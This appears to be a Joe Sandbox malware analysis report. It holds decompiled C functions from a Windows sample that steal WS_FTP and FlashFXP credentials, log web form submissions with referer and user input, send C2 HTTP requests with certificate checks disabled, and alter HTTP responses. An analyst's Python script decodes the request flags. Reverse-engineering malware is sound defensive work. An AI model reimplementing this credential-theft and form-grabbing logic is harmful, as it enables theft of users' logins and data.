                				void* _t151;
                				char* _t153;
                				char _t155;
                				char* _t157;
                				intOrPtr _t162;
                				intOrPtr* _t163;
                				void* _t164;
                				void* _t165;
                
                				_t164 = __esi;
                				_t158 = __edx;
                				_t94 =  *((intOrPtr*)(__esi + 0x30));
                				_v12 = _v12 & 0x00000000;
                				_v5 = 0xff;
                				_t167 = _t94;
                				if(_t94 == 0) {
                					L24:
                					if((_v12 & 0x00000001) == 0) {
                						_t124 =  *((intOrPtr*)(_t164 + 0x34));
                						_t184 = _t124;
                						if(_t124 != 0 && E00403A8F(_t152, _t158, _t184, 3, _t124,  *(_t164 + 4),  *(_t164 + 8)) != 0) {
                							_v12 = _v12 | 0x00000001;
                						}
                					}
                					_t145 =  *((intOrPtr*)(_t164 + 0x1c));
                					if(_t145 < 0x21) {
                						L37:
                						_v13 = 0;
                						goto L38;
                					} else {
                						_t162 =  *((intOrPtr*)(_t164 + 0x18));
                						if(E00409868("application/x-www-form-urlencoded", _t162, 0x21) != 0) {
                							goto L37;
                						}
                						_t123 =  *((intOrPtr*)(_t162 + 0x21));
                						if(_t123 == 0x3b || _t123 == 0) {
                							_v13 = 1;
                							L38:
                							if(_v5 != 0xff) {
                								__eflags = _v5 - 1;
                								if(_v5 != 1) {
                									L44:
                									if((_v12 & 0x00000008) == 0) {
                										L74:
                										_t95 = _v12;
                										if((_t95 & 0x00000001) != 0) {
                											return _t95;
                										}
                										if(E00403AF3(_t158, _t164) != 0) {
                											_v12 = _v12 | 0x00000002;
                										}
                										if(_v13 != 0 && E00403E70(_t158, _t164) != 0) {
                											_v12 = _v12 | 0x00000004;
                										}
                										return _v12;
                									}
                									_t99 =  *((intOrPtr*)(_t164 + 0x24));
                									_v5 = 0;
                									if( *((intOrPtr*)(_t164 + 0x24)) != 0) {
                										__eflags = _v13;
                										if(_v13 == 0) {
                											__eflags = _t145;
                											if(_t145 != 0) {
                												_t101 = E0040A545( &_v20, "*FAILED TO PARSE \"%s\"*",  *((intOrPtr*)(_t164 + 0x18)));
                												_t165 = _t165 + 0xc;
                												__eflags = _t101 - 1;
                												if(_t101 < 1) {
                													_v20 = 0;
                												}
                												L61:
                												if(_v20 == 0) {
                													L73:
                													_v12 = _v12 & 0xfffffff7;
                													goto L74;
                												}
                												E00412A5F( &_v24);
                												_t104 = E00409A3C( *(_t164 + 8), 0,  *(_t164 + 4));
                												_t161 = _t104;
                												if(_t104 != 0) {
                													_t158 = 0x3c;
                													E004098AA( &_v84,  &_v84, 0, _t158);
                													_v84 = _t158;
                													if(InternetCrackUrlA( *(_t164 + 4),  *(_t164 + 8), 0,  &_v84) == 1) {
                														_t158 = _v24;
                														_t153 = 0x401458;
                														if(_t158 == 0) {
                															_t158 = 0x401458;
                														}
                														_t112 =  *(_t164 + 0xc);
                														if(_t112 == 0) {
                															_t112 = "-";
                														}
                														if((_v12 & 0x00000001) != 0) {
                															_t153 = L" *BLOCKED*";
                														}
                														_push(_v20);
                														_push(_t158);
                														_push(_t112);
                														_push(_t153);
                														_v5 = E00412544(_t153, _t158, (0 | _v72 == 0x00000004) + 0xb, (0 | _v72 == 0x00000004) + 0xb, _t161, 0, L"%s%s\nReferer: %S\nUser input: %s\nData:\n\n%S", _t161);
                													}
                													E004097F7(_t161);
                												}
                												E004097F7(_v24);
                												E004097F7(_v20);
                												if(_v5 != 0) {
                													goto L74;
                												} else {
                													goto L73;
                												}
                											}
                											_push("*UNKNOWN*");
                											_push(9);
                											L58:
                											_pop(_t117);
                											_v20 = E00409B94(_t117);
                											goto L61;
                										}
                										_t119 = E00409B94(_t99,  *((intOrPtr*)(_t164 + 0x20)));
                										_v20 = _t119;
                										__eflags = _t119;
                										if(_t119 == 0) {
                											goto L73;
                										}
                										_t120 = 0;
                										__eflags =  *((intOrPtr*)(_t164 + 0x24));
                										if( *((intOrPtr*)(_t164 + 0x24)) <= 0) {
                											goto L61;
                										} else {
                											goto L50;
                										}
                										do {
                											L50:
                											_t158 = _t120 + _v20;
                											_t155 =  *_t158;
                											__eflags = _t155 - 0x26;
                											if(_t155 != 0x26) {
                												__eflags = _t155 - 0x2b;
                												if(_t155 == 0x2b) {
                													 *_t158 = 0x20;
                												}
                											} else {
                												 *_t158 = 0xa;
                											}
                											_t120 = _t120 + 1;
                											__eflags = _t120 -  *((intOrPtr*)(_t164 + 0x24));
                										} while (_t120 <  *((intOrPtr*)(_t164 + 0x24)));
                										goto L61;
                									}
                									_push("*EMPTY*");
                									_push(7);
                									goto L58;
                								}
                								L43:
                								_v12 = _v12 | 0x00000008;
                								goto L44;
                							}
                							if( *((char*)(_t164 + 0x14)) != 1 ||  *((intOrPtr*)(_t164 + 0x24)) <= 0) {
                								goto L44;
                							} else {
                								goto L43;
                							}
                						} else {
                							goto L37;
                						}
                					}
                				}
                				_t126 = E00410520( &_v24, __edx, _t167, _t94, 0x4e25, 0x10000000);
                				_t152 = _v24;
                				_t163 = _t126;
                				_v20 = _t163;
                				if(E0040A690(_t126, _v24) == 0) {
                					L23:
                					E004097F7(_v20);
                					goto L24;
                				} else {
                					goto L2;
                				}
                				do {
                					L2:
                					_t8 = _t163 + 1; // 0x1
                					_t157 = _t8;
                					if( *_t157 == 0) {
                						goto L22;
                					}
                					_t130 =  *_t163;
                					if(_t130 == 0x21) {
                						L12:
                						_t163 = _t157;
                						L13:
                						_t152 = _t163;
                						if(E004037F5(_t163,  *(_t164 + 4),  *(_t164 + 8)) == 0) {
                							goto L22;
                						}
                						_t133 = _t151;
                						if(_t133 == 0) {
                							L20:
                							_v5 = 1;
                							L21:
                							if(_t151 != 2) {
                								goto L23;
                							}
                							goto L22;
                						}
                						_t134 = _t133 - 1;
                						if(_t134 == 0) {
                							_v5 = 0;
                							goto L21;
                						}
                						_t135 = _t134 - 1;
                						if(_t135 == 0) {
                							_t158 = 0x3c;
                							E004098AA( &_v84,  &_v84, 0, _t158);
                							_v68 =  &_v348;
                							_v84 = _t158;
                							_v64 = 0x103;
                							_t140 = InternetCrackUrlA( *(_t164 + 4),  *(_t164 + 8), 0,  &_v84);
                							__eflags = _t140 - 1;
                							if(_t140 == 1) {
                								__eflags = _v64;
                								if(_v64 > 0) {
                									E00412A19( &_v348);
                								}
                							}
                							goto L21;
                						}
                						_t143 = _t135 - 1;
                						if(_t143 == 0 || _t143 == 1) {
                							_v12 = _v12 | 0x00000001;
                							goto L20;
                						} else {
                							goto L21;
                						}
                					}
                					if(_t130 == 0x2d) {
                						goto L12;
                					}
                					if(_t130 == 0x40) {
                						goto L12;
                					}
                					if(_t130 == 0x5e) {
                						_t151 = 4;
                						goto L12;
                					} else {
                						_t151 = 0;
                						goto L13;
                					}
                					L22:
                					_t152 = _t163;
                					_t163 = E0040A6CE(_t163, 1);
                				} while (_t163 != 0);
                				goto L23;
                			}

                APIs
                • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 004041A5
                • InternetCrackUrlA.WININET(?,00000008,00000000,?), ref: 004042CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CrackInternet
                • String ID: *BLOCKED*$%s%sReferer: %SUser input: %sData:%S$*EMPTY*$*FAILED TO PARSE "%s"*$*UNKNOWN*$application/x-www-form-urlencoded
                • API String ID: 1381609488-1559281305
                • Opcode ID: e36040128e56cb123b1fcc41006542400295cc65ca160b8b2ed8698f57265e4b
                • Instruction ID: 9577ca87807d87a453b55c3b0b986da9c52cd2913c1421e9690d52129667f7dc
                • Opcode Fuzzy Hash: e36040128e56cb123b1fcc41006542400295cc65ca160b8b2ed8698f57265e4b
                • Instruction Fuzzy Hash: 28A136B0A00345AADF219BA0C849BBFBBB6AFD1304F14447FE6417A2D1D77D98868719
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00405D7C(char** __edx, void* __eflags) {
                				intOrPtr _v8;
                				char _v12;
                				char* _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v548;
                				short _v1068;
                				void* __edi;
                				void* __esi;
                				char* _t23;
                				WCHAR* _t37;
                				signed int _t38;
                				void* _t39;
                				intOrPtr _t47;
                
                				_t35 = __edx;
                				E004098AA( &_v12,  &_v12, 0, 8);
                				_t37 =  &_v548;
                				_t23 = E0040ED7B(0x104, _t37, 0x80000001, L"SOFTWARE\\ipswitch\\ws_ftp", L"datadir");
                				if(_t23 != 0xffffffff && _t23 > 0) {
                					ExpandEnvironmentStringsW(_t37,  &_v1068, 0x104);
                					_t23 = E00405B75( &_v1068,  &_v12);
                				}
                				if(_v8 == 0) {
                					_v28 = 0x1a;
                					_v24 = 0x26;
                					_v20 = 0x23;
                					_v16 = L"*ipswitch*";
                					_t38 = 0;
                					do {
                						_t23 =  &_v548;
                						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t39 + _t38 * 4 - 0x18)), 0, 0, _t23);
                						_t45 = _t23;
                						if(_t23 == 0) {
                							_t35 =  &_v16;
                							_t23 = E0040B4D8( &_v548,  &_v16, _t45, 1, 2, E00405B9D,  &_v12, 0, 0, 0);
                						}
                						_t38 = _t38 + 1;
                					} while (_t38 < 3);
                					_t47 = _v8;
                				}
                				if(_t47 > 0) {
                					E00412508(_t23, _v12, _t35, _t47, L"WS_FTP");
                				}
                				return E004097F7(_v12);
                			}

                APIs
                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\ipswitch\ws_ftp,datadir,?,00000000,00000008), ref: 00405DC9
                • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,80000001,SOFTWARE\ipswitch\ws_ftp,datadir,?,00000000,00000008), ref: 00405E0F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentExpandFolderPathStrings
                • String ID: #$&$*ipswitch*$SOFTWARE\ipswitch\ws_ftp$WS_FTP$datadir
                • API String ID: 1452579279-1839599621
                • Opcode ID: 4fb15aaa69f691bb1333331d55a590a383eb4425b040b32e5969ca79be2e2547
                • Instruction ID: 70bc6e024199b99dcd6e5e00357b857d5a36bc4f7a6a9f0c867153ae0b6ef388
                • Opcode Fuzzy Hash: 4fb15aaa69f691bb1333331d55a590a383eb4425b040b32e5969ca79be2e2547
                • Instruction Fuzzy Hash: 89214FB2A00118BADB10AB95DC89EEF777CEB04348F10407BB611B61D1D6785F85CFA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E004055DD(char** __edx, void* __eflags) {
                				intOrPtr _v8;
                				char _v12;
                				char* _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v548;
                				short _v1068;
                				void* __edi;
                				void* __esi;
                				char* _t23;
                				WCHAR* _t37;
                				signed int _t38;
                				void* _t39;
                				intOrPtr _t47;
                
                				_t35 = __edx;
                				E004098AA( &_v12,  &_v12, 0, 8);
                				_t37 =  &_v548;
                				_t23 = E0040ED7B(0x104, _t37, 0x80000002, L"SOFTWARE\\FlashFXP\\3", L"datafolder");
                				if(_t23 != 0xffffffff && _t23 > 0) {
                					ExpandEnvironmentStringsW(_t37,  &_v1068, 0x104);
                					_t23 = E004053D2( &_v12);
                				}
                				if(_v8 == 0) {
                					_v28 = 0x23;
                					_v24 = 0x1a;
                					_v20 = 0x26;
                					_v16 = L"*flashfxp*";
                					_t38 = 0;
                					do {
                						_t23 =  &_v548;
                						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t39 + _t38 * 4 - 0x18)), 0, 0, _t23);
                						_t45 = _t23;
                						if(_t23 == 0) {
                							_t35 =  &_v16;
                							_t23 = E0040B4D8( &_v548,  &_v16, _t45, 1, 2, E0040540A,  &_v12, 0, 0, 0);
                						}
                						_t38 = _t38 + 1;
                					} while (_t38 < 3);
                					_t47 = _v8;
                				}
                				if(_t47 > 0) {
                					E00412508(_t23, _v12, _t35, _t47, L"FlashFXP");
                				}
                				return E004097F7(_v12);
                			}

                APIs
                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000002,SOFTWARE\FlashFXP\3,datafolder,?,00000000,00000008), ref: 0040562A
                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,80000002,SOFTWARE\FlashFXP\3,datafolder,?,00000000,00000008), ref: 00405670
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentExpandFolderPathStrings
                • String ID: #$&$*flashfxp*$FlashFXP$SOFTWARE\FlashFXP\3$datafolder
                • API String ID: 1452579279-2914266125
                • Opcode ID: a958bb0c54800d46158cf0a0d729a866b73a2e997e5829ff4db041a4d43dc555
                • Instruction ID: 378d6ca4e251ff040e5d3960efc37a14b55815b444e39fac56b54a9bacc65119
                • Opcode Fuzzy Hash: a958bb0c54800d46158cf0a0d729a866b73a2e997e5829ff4db041a4d43dc555
                • Instruction Fuzzy Hash: 47214FB2E00218BADB10AA95DCC9EEFB77CEB04345F50047BB605B21D1D6795E858BA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E0040AAD7(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
                				long _t18;
                				char* _t21;
                				signed int _t29;
                				char* _t30;
                				void* _t32;
                
                				_t29 = _a20 & 0x00000002;
                				_t18 = 0x8404f700;
                				if(_t29 != 0) {
                					_t18 = 0x8444f700;
                				}
                				if((_a20 & 0x00000004) != 0) {
                					_t18 = _t18 | 0x00800000;
                				}
                				_t30 = "POST";
                				if((_a20 & 0x00000001) == 0) {
                					_t30 = "GET";
                				}
                				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x419000, _t18, 0);
                				if(_t32 == 0) {
                					L15:
                					return 0;
                				} else {
                					if(_t29 == 0) {
                						_push(0x13);
                						_t21 = "Connection: close\r\n";
                						_pop(0);
                					} else {
                						_t21 = 0;
                					}
                					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
                						L14:
                						InternetCloseHandle(_t32);
                						goto L15;
                					} else {
                						_a20 = _a20 & 0x00000000;
                						_a8 = 4;
                						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
                							goto L14;
                						} else {
                							return _t32;
                						}
                					}
                				}
                			}

                0x0040aade
                0x0040aae2
                0x0040aae7
                0x0040aae9
                0x0040aae9
                0x0040aaf2
                0x0040aaf4
                0x0040aaf4
                0x0040aafd
                0x0040ab02
                0x0040ab04
                0x0040ab04
                0x0040ab25
                0x0040ab29
                0x0040ab89
                0x00000000
                0x0040ab2b
                0x0040ab2d
                0x0040ab35
                0x0040ab37
                0x0040ab3c
                0x0040ab2f
                0x0040ab2f
                0x0040ab31
                0x0040ab4e
                0x0040ab82
                0x0040ab83
                0x00000000
                0x0040ab50
                0x0040ab50
                0x0040ab64
                0x0040ab73
                0x00000000
                0x0040ab7e
                0x00000000
                0x0040ab7e
                0x0040ab73
                0x0040ab4e

                APIs
                • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00419000,8404F700,00000000), ref: 0040AB1F
                • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 0040AB46
                • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 0040AB6B
                • InternetCloseHandle.WININET(00000000), ref: 0040AB83
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
                • String ID: Connection: close$GET$HTTP/1.1$POST
                • API String ID: 3080274660-1621676011
                • Opcode ID: b845cd61b2281eabe1c02a1c749b283243685b3a7e9ca67ef254d365ce712ddb
                • Instruction ID: fe8bb67697bf3a27da17a6b372c7a79c2f063cffa21b7a271b1fcb636e6b911c
                • Opcode Fuzzy Hash: b845cd61b2281eabe1c02a1c749b283243685b3a7e9ca67ef254d365ce712ddb
                • Instruction Fuzzy Hash: 38114F312503097BEB218E549D45FEB3BA99B14754F144036FE01A51E0D7B8EA60C7EE
                Uniqueness

                Uniqueness Score: -1.00%
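
                The request wrapper E0040AAD7 above builds its HttpOpenRequestA flag word from three bits of _a20 and only hands the request handle back when the status code is 0xC8 (HTTP 200). The Python below is an added example, not code from the sample or from Joe Sandbox: it reproduces that selection and names each INTERNET_FLAG_* bit using the published wininet.h constants. The reading of _a20 as bit0 = POST, bit1 = keep-alive, bit2 = TLS follows directly from the decompiled tests. Decoded, 0x8404F700 is RELOAD, NO_CACHE_WRITE, NO_AUTH, IGNORE_REDIRECT_TO_HTTP, IGNORE_REDIRECT_TO_HTTPS, IGNORE_CERT_DATE_INVALID, IGNORE_CERT_CN_INVALID, HYPERLINK, NO_UI and PRAGMA_NOCACHE, which is the detail an analyst wants: with both certificate checks disabled, the HTTPS variant of this C2 traffic can be intercepted with any self-signed certificate. The 0x20000013 passed to HttpQueryInfoA is HTTP_QUERY_STATUS_CODE (19) with the HTTP_QUERY_FLAG_NUMBER modifier.

```python
"""Decode the WinINet flag words used by E0040AAD7.

Added example for this report; not code from the analysed sample. The INTERNET_FLAG_*
and HTTP_QUERY_* values are the published wininet.h constants.
"""
from __future__ import annotations

INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000400: "INTERNET_FLAG_HYPERLINK",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}

HTTP_QUERY_MODIFIERS = {
    0x80000000: "HTTP_QUERY_FLAG_REQUEST_HEADERS",
    0x40000000: "HTTP_QUERY_FLAG_SYSTEMTIME",
    0x20000000: "HTTP_QUERY_FLAG_NUMBER",
    0x10000000: "HTTP_QUERY_FLAG_COALESCE",
}
HTTP_QUERY_STATUS_CODE = 19  # 0x13, the low half of 0x20000013


def decode_flags(value: int, table: dict[int, str] = INTERNET_FLAGS) -> list[str]:
    """Split a flag word into named bits, highest bit first; leftover bits are reported as hex."""
    names = []
    remaining = value
    for bit, name in sorted(table.items(), reverse=True):
        if remaining & bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        names.append(f"UNKNOWN(0x{remaining:08x})")
    return names


def decode_query_info(value: int) -> tuple[int, list[str]]:
    """Separate an HttpQueryInfo info level (low 16 bits) from its modifier flags (high bits)."""
    return value & 0x0000FFFF, decode_flags(value & 0xFFFF0000, HTTP_QUERY_MODIFIERS)


def build_request(a20: int) -> tuple[str, int]:
    """Mirror of the flag logic in E0040AAD7: bit1 of _a20 selects the keep-alive word, bit2 adds SECURE, bit0 selects POST."""
    flags = 0x8444F700 if a20 & 0x2 else 0x8404F700
    if a20 & 0x4:
        flags |= 0x00800000  # INTERNET_FLAG_SECURE
    verb = "POST" if a20 & 0x1 else "GET"
    return verb, flags


def extra_headers(a20: int) -> bytes | None:
    """E0040AAD7 passes 'Connection: close\\r\\n' (19 bytes, the pushed 0x13) unless keep-alive was requested."""
    return None if a20 & 0x2 else b"Connection: close\r\n"


def accepts_status(status: int) -> bool:
    """The handle is returned only when HttpQueryInfoA reports 0xC8, i.e. HTTP 200."""
    return status == 0xC8


if __name__ == "__main__":
    for a20 in (0, 1, 2, 4, 7):
        verb, flags = build_request(a20)
        print(f"_a20={a20}: {verb} 0x{flags:08X} -> {', '.join(decode_flags(flags))}")
    print(decode_query_info(0x20000013))
```

                Running the script lists the decoded flag set for each _a20 combination; the keep-alive variant differs from the default only by INTERNET_FLAG_KEEP_CONNECTION, and no bit of either word falls outside the table.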

                C-Code - Quality: 79%
                			E0041491F(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				char _v20;
                				signed char _v32;
                				char _v36;
                				char _v40;
                				signed int _v44;
                				void* _v48;
                				signed int _v52;
                				intOrPtr _v60;
                				intOrPtr _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t100;
                				signed int _t101;
                				signed int _t102;
                				intOrPtr _t104;
                				void* _t105;
                				signed int _t108;
                				signed int _t109;
                				signed int _t111;
                				intOrPtr _t120;
                				void* _t128;
                				void* _t132;
                				signed int _t140;
                				void* _t150;
                				struct _CRITICAL_SECTION* _t154;
                				intOrPtr _t156;
                				intOrPtr _t168;
                				signed int _t170;
                				signed int _t176;
                				char _t178;
                				void* _t179;
                				intOrPtr _t181;
                				signed int _t184;
                				intOrPtr _t187;
                				void* _t189;
                				signed int _t190;
                				void* _t192;
                				void* _t193;
                				void* _t194;
                
                				E00407B30();
                				_t100 = E00407B3F();
                				_t181 = _a4;
                				if(_t100 == 0 || _a8 == 0 || _a12 <= 0) {
                					L43:
                					_t101 =  *0x41ac5c(_t181, _a8, _a12);
                					goto L44;
                				} else {
                					_t154 = 0x41ac38;
                					EnterCriticalSection(0x41ac38);
                					_t102 = E0041400F(_t181);
                					if(_t102 == 0xffffffff) {
                						L42:
                						LeaveCriticalSection(_t154);
                						goto L43;
                					}
                					_t104 = _t102 * 0x38 +  *0x41ac54;
                					if( *((intOrPtr*)(_t104 + 0x30)) > 0) {
                						L33:
                						_t184 =  *((intOrPtr*)(_t104 + 0x30)) -  *((intOrPtr*)(_t104 + 0x34));
                						__eflags = _a12 - _t184;
                						if(_a12 < _t184) {
                							_t184 = _a12;
                						}
                						_t87 = _t104 + 0x2c; // -4303912
                						_t175 = _t87;
                						_t105 = E00409833(_a8,  *_t87 +  *((intOrPtr*)(_t104 + 0x34)), _t184);
                						 *((intOrPtr*)(_t105 + 0x34)) =  *((intOrPtr*)(_t105 + 0x34)) + _t184;
                						__eflags =  *((intOrPtr*)(_t105 + 0x34)) -  *((intOrPtr*)(_t105 + 0x30));
                						if( *((intOrPtr*)(_t105 + 0x34)) ==  *((intOrPtr*)(_t105 + 0x30))) {
                							E004097F7( *_t175);
                							E00409898(_t175, 0xc);
                						}
                						LeaveCriticalSection(_t154);
                						_t101 = _t184;
                						L44:
                						return _t101;
                					}
                					if( *((intOrPtr*)(_t104 + 0x10)) <= 0) {
                						goto L42;
                					}
                					LeaveCriticalSection(0x41ac38);
                					_t108 =  *0x41ac5c(_t181, _a8, _a12);
                					_v52 = _t108;
                					if(_t108 <= 0xffffffff) {
                						L41:
                						_t101 = _v52;
                						goto L44;
                					}
                					EnterCriticalSection(0x41ac38);
                					_t109 = E0041400F(_t181);
                					_t176 = _t109;
                					if(_t176 == 0xffffffff) {
                						L38:
                						_push(8);
                						_push(0xffffe890);
                						L39:
                						 *0x41ac34();
                						_v52 = _v52 | 0xffffffff;
                						L40:
                						LeaveCriticalSection(_t154);
                						goto L41;
                					}
                					_t170 = _v52;
                					if(_t170 == 0) {
                						L11:
                						_t178 = _t176 * 0x38 +  *0x41ac54;
                						_v36 = _t178;
                						if(_t170 > 0) {
                							E00409833( *((intOrPtr*)(_t178 + 0x14)) +  *((intOrPtr*)(_t178 + 0x18)), _a8, _t170);
                							 *((intOrPtr*)(_t178 + 0x18)) =  *((intOrPtr*)(_t178 + 0x18)) + _t170;
                						}
                						_t111 = E00414534(_t157,  &_v20,  *((intOrPtr*)(_t178 + 0x14)),  *((intOrPtr*)(_t178 + 0x18)));
                						_v52 = _t111;
                						if(_t111 == 1) {
                							_t120 = E004146DC( &_v20,  *((intOrPtr*)(_t178 + 0x18)),  *((intOrPtr*)(_t178 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
                							_v60 = _t120;
                							if(_t120 == 1) {
                								if(E00404375( *((intOrPtr*)(_t178 + 0x10)),  *((intOrPtr*)(_t178 + 0xc)),  *((intOrPtr*)(_t178 + 4)),  &_v48,  &_v40) != 0) {
                									_t156 = _v40;
                									_t128 =  *((intOrPtr*)(_t178 + 0x18)) - _v8 + _v12;
                									_t129 = _t128 + _t156 + 0x14;
                									if(_t128 + _t156 + 0x14 != 0) {
                										_t187 = E004097CC(_t129);
                										_v40 = _t187;
                										if(_t187 != 0) {
                											_t132 = E00409833(_t187,  *((intOrPtr*)(_t178 + 0x14)), _v12);
                											_push(_t156);
                											if((_v32 & 0x00000002) == 0) {
                												E00409F05( &_v32);
                												_t189 = E0040FE63(_t187, _v16, "Content-Length",  &_v36) + _v60;
                												E00409833(_t189, _v68, _t156);
                												_t190 = _t189 + _t156;
                												__eflags = _t190;
                											} else {
                												_push("%x\r\n");
                												_t192 = _t187 + _t132;
                												_t179 = 0xd;
                												_t193 = _t192 + E0040A4FB(_t132, _t179, _t192);
                												E00409833(_t193, _v48, _t156);
                												_t194 = _t193 + _t156;
                												E00409833(_t194, "\r\n0\r\n\r\n", 7);
                												_t178 = _v60;
                												_t190 = _t194 + 7;
                											}
                											_t138 =  *((intOrPtr*)(_t178 + 0x18));
                											if(_v8 !=  *((intOrPtr*)(_t178 + 0x18))) {
                												_t190 = _t190 + E00409833(_t190,  *((intOrPtr*)(_t178 + 0x14)) + _v8, _t138 - _v8);
                											}
                											E004097F7( *((intOrPtr*)(_t178 + 0x14)));
                											_t140 = _v44;
                											 *((intOrPtr*)(_t178 + 0x14)) = _t140;
                											 *((intOrPtr*)(_t178 + 0x18)) = _t190 - _t140;
                										}
                									}
                								}
                								_v44 = _v44 | 0xffffffff;
                								E004097F7(_v48);
                							}
                							_t154 = 0x41ac38;
                						}
                						if(_v52 <= 0) {
                							L30:
                							if(__eflags == 0) {
                								L32:
                								 *((intOrPtr*)(_t178 + 0x2c)) =  *((intOrPtr*)(_t178 + 0x14));
                								 *((intOrPtr*)(_t178 + 0x30)) =  *((intOrPtr*)(_t178 + 0x18));
                								 *((intOrPtr*)(_t178 + 0x34)) = 0;
                								 *((intOrPtr*)(_t178 + 0x14)) = 0;
                								 *((intOrPtr*)(_t178 + 0x18)) = 0;
                								E00404821( *((intOrPtr*)(_t178 + 0x10)),  *((intOrPtr*)(_t178 + 0xc)));
                								_t104 = _v40;
                								 *((intOrPtr*)(_t178 + 0x10)) = 0;
                								 *((intOrPtr*)(_t178 + 0xc)) = 0;
                								goto L33;
                							}
                							__eflags = _v44 - 0xffffffff;
                							if(_v44 != 0xffffffff) {
                								goto L40;
                							}
                							goto L32;
                						} else {
                							if(_v44 != 0) {
                								__eflags = _v52;
                								goto L30;
                							}
                							_push(0);
                							_push(0xffffe892);
                							goto L39;
                						}
                					}
                					_t168 =  *0x41ac54; // 0x0
                					_t150 = _t109 * 0x38 + _t168;
                					_t157 =  *((intOrPtr*)(_t150 + 0x18)) + _t170;
                					_t11 = _t150 + 0x14; // 0x14
                					if(E00409787( *((intOrPtr*)(_t150 + 0x18)) + _t170, _t11) == 0) {
                						goto L38;
                					} else {
                						_t170 = _v52;
                						goto L11;
                					}
                				}
                			}

                0x0041492b
                0x00414930
                0x00414935
                0x0041493a
                0x00414c30
                0x00414c37
                0x00000000
                0x00414954
                0x0041495a
                0x00414960
                0x00414962
                0x0041496a
                0x00414c29
                0x00414c2a
                0x00000000
                0x00414c2a
                0x00414973
                0x0041497d
                0x00414bc3
                0x00414bc6
                0x00414bc9
                0x00414bcc
                0x00414bce
                0x00414bce
                0x00414bd1
                0x00414bd1
                0x00414bde
                0x00414be3
                0x00414be9
                0x00414bec
                0x00414bf0
                0x00414bf8
                0x00414bf8
                0x00414bfe
                0x00414c04
                0x00414c40
                0x00414c46
                0x00414c46
                0x00414987
                0x00000000
                0x00000000
                0x0041498e
                0x0041499b
                0x004149a7
                0x004149ab
                0x00414c23
                0x00414c23
                0x00000000
                0x00414c23
